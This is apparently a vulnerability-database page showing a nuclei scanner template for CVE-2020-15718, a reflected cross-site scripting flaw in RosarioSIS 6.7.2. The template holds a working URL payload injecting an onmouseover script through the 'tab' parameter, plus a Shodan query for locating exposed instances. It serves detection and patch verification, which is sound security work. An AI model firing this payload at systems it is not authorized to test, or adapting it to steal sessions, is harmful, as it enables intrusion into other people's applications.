Lucene search
K

RosarioSIS 6.7.2 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

RosarioSIS 6.7.2 and earlier have a reflected XSS in Preferences tab via crafted URL.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-15718
4 Dec 202521:02
circl
CNVD
RosarioSIS Cross-Site Scripting Vulnerability
27 Jul 202000:00
cnvd
CVE
CVE-2020-15718
15 Jul 202019:02
cve
Cvelist
CVE-2020-15718
15 Jul 202019:02
cvelist
Exploit DB
RosarioSIS 6.7.2 - Cross-Site Scripting (XSS)
3 Dec 202500:00
exploitdb
EUVD
EUVD-2020-7704
7 Oct 202500:30
euvd
NVD
CVE-2020-15718
15 Jul 202020:15
nvd
OSV
CVE-2020-15718
15 Jul 202020:15
osv
Packet Storm
📄 RosarioSIS 6.7.2 Cross Site Scripting
3 Dec 202500:00
packetstorm
Prion
Input validation
15 Jul 202020:15
prion
Rows per page
id: CVE-2020-15718

info:
  name: RosarioSIS 6.7.2 - Cross-Site Scripting
  author: 0xr2r,jarvis-survives
  severity: medium
  description: |
    RosarioSIS version 6.7.2 and earlier contains a reflected cross-site scripting (XSS) vulnerability in the Preferences module. The 'tab' parameter in Modules.php is not properly sanitized, allowing an attacker to inject arbitrary JavaScript code via a crafted URL.
  impact: |
    An attacker can execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session hijacking, credential theft, or other malicious actions.
  remediation: |
    Update RosarioSIS to the latest version where input validation has been improved.
  reference:
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/184944
    - https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2020-15718.md
    - https://gitlab.com/francoisjacquet/rosariosis/-/blob/mobile/CHANGES.md
    - https://gitlab.com/francoisjacquet/rosariosis/-/commit/89ae9de732024e3a2e99262aa98b400a1aa6975a
  classification:
    cve-id: CVE-2020-15718
    cwe-id: CWE-79
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    epss-score: 0.06325
    epss-percentile: 0.92779
    cpe: cpe:2.3:a:rosariosis:rosariosis:6.7.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"RosarioSIS"
    product: rosariosis
    vendor: rosariosis
  tags: cve,cve2020,rosarios,xss,rosariosis,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/Modules.php?modname=Users/Preferences.php&tab="%20onmouseover=alert(document.domain)%20x="'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '" onmouseover=alert(document.domain)'
          - 'RosarioSIS'
        condition: and
        case-insensitive: true

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220354cad47c24e837ffb104b98026b2f4cc47a304d0a91cd23cb24170bb0715e2e022100bcd8e6b0ffef36923811a3209a116bf37ae4fe82f46a41c5ae930ce9a586ec96:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Mar 2026 19:48Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.06325
13